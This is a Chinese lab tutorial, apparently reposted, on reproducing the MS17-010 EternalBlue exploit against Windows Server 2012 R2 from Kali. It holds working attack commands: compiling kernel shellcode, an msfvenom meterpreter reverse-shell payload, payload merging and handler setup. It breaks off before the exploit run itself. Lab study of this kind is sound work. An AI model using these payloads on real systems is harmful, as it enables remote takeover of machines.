windows server 2012激活实验-windows渗透测试-复现MS17-010漏洞
7.1 实验目的
(1)尝试windows操作系统渗透
(2)了解windows漏洞的相关知识
(3)复现MS17-010漏洞
7.2 实验要求
(1)采用windows server 2012 r2(作为靶机)和kali(作为攻击机),利用MS17-010漏洞成功渗透测试靶机。
7.3 实验步骤
7.3.1 环境设置
首先请关闭防火墙,如图3-1所示操作:
先打开控制面板
7-1 打开控制面板
然后依次选择 系统和安全 -> Windows防火墙 -> 启用或关闭防火墙。如图3-2关闭Windwos防火墙。
7-2 关闭防火墙
本实验需要在Windows server 2012中启动Guest账号,具体操作如下图所示;
7-3 打开管理工具
7-4 打开本机安全策略
7-5 本地策略-安全策略中到账户:来宾账户状态
7-6 启用来宾账户
7.3.2 编译Sleepya开发的内核shellcode
把附件中的eternalblue_x64_kshellcode.asm(Sleepya开发的内核shellcode)复制进去kali中;
然后如图3-7,使用NASM工具对asm代码编译,输入以下命令:
nasm -f bin eternalblue_x64_kshellcode.asm
7-7 编译asm代码
7.3.3 使用msfvenom生成一个反弹shellcode攻击的payload
如图3-8所示,输入指令生成一个基于TCP的反弹shell,LHOST和LPORT为本地ip和端口;
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.232.148 LPORT=9090
7-8 反弹shellcode攻击的payload
7.3.4 合并内核shellcode和payload
如图3-9所示,输入指令:
cat eternalblue_x64_kshellcode meterpreter_msf.bin > metasploit_msf.bin
7-9 合并内核shellcode和payload
7.3.5 设置监听
实施攻击之前,先去设置监听,在新的终端窗口中打开Metasploit(在终端输入msfconsole);
如图3-10所示,使用模块handler,设置payload为reverse_tcp,设置监听的Localhost的ip和端口,用来接受反弹的shellcode。注:下方将LHOST设置为127.0.0.1
7-10 设置监听
然后等待反弹shell。(注:反弹成功后会出现如下划线文字)
图 7-11
7.3.6 实施攻击
将我们附件中的eternalblue_exploit8.py复制进kali中。
默认情况下,客户端帐户在Windows Server 2012 R2中处于禁用状态, 但是,如果被管理员激活,那么可以利用它来获取目标中的SYSTEM shell。第一步是如图3-11所示修改eternalblue_exploit8.py,并指出它将是用于验证的那个帐户。
7-12 设置USERNAME为Guest
然后重新打开一个新的终端,如图3-12所示,输入以下指令进行漏洞的利用:

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。